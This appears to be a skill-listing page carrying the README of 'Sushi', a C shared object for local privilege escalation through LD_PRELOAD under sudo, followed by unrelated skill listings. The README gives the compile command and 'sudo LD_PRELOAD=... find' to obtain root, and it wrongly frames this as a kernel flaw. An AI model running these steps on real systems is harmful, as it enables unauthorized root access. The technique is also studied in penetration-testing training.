Sushi
Sushi すし, a shared object written in C language to perform LPE (Local Privilege Escalation) within vulnerable UNIX kernels using the LD_PRELOAD check. I'M NOT RESPONSIBLE FOR ANY MISUSE OF THIS PROGRAM, USE AT YOUR OWN RISK.
Install / Use
/learn @not1cyyy/SushiREADME
Sushi
Sushi すし, a shared object written in C language to perform LPE (Local Privilege Escalation) within vulnerable UNIX kernels using the LD_PRELOAD check
Compile and run
- Use the following command to create the shared object:
gcc -fPIC -shared -o exploit.so exploit.c -nostartfiles - Now use this shared object as a value for LD_PRELOAD and get root privileges:
sudo LD_PRELOAD=/home/exploit.so find
DISCLAIMER
I'M NOT RESPONSIBLE FOR ANY MISUSE OF THIS PROGRAM, USE AT YOUR OWN RISK.
Related Skills
node-connect
349.0kDiagnose OpenClaw node connection and pairing failures for Android, iOS, and macOS companion apps
frontend-design
109.4kCreate distinctive, production-grade frontend interfaces with high design quality. Use this skill when the user asks to build web components, pages, or applications. Generates creative, polished code that avoids generic AI aesthetics.
openai-whisper-api
349.0kTranscribe audio via OpenAI Audio Transcriptions API (Whisper).
qqbot-media
349.0kQQBot 富媒体收发能力。使用 <qqmedia> 标签,系统根据文件扩展名自动识别类型(图片/语音/视频/文件)。
